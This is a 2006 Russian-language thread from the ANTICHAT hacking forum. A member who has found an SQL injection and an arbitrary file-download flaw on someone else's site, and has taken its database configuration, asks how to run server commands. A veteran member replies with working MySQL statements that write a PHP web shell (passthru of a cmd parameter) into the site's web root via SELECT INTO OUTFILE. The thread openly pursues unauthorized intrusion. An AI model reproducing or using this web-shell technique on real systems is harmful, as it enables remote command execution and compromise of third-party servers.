HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Шелл через SQL
  #1  
Старый 06.04.2006, 17:14
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию Шелл через SQL

Значит нашел сайт с sql инъекцией, составил запрос ошибок не возникает, но результат в браузер не выводиться. В чем тут может быть проблема?

Еще есть возможность скачивать ЛЮБЫЕ файлы с сервака с помощью кривого скрипта!!!! Скачать значит файл с настройками базы от форума IPB.

Скачал скрипт - rst.void.ru/download/sql.rar для коннекта к базе! Он успешно подсоединяеться, но опять же в браузере пусто!! ((

Помогите советом!
 

  #2  
Старый 06.04.2006, 17:23
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию

Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
 

  #3  
Старый 06.04.2006, 20:29
asm33
Познающий
Регистрация: 19.01.2006
Сообщений: 58
С нами: 10687402

Репутация: 6
По умолчанию

так вроде бы KEZ видео делал. Выполнение команд посредством sql инъекции
 

  #4  
Старый 27.04.2006, 13:14
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

Цитата:
Сообщение от NeX  
Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
Для этого есть поиск.Вот код:
Код:
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/полный/путь/к/сайту/шелл.php' FROM `shell`;
DROP TABLE `shell`;
Закрыта.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.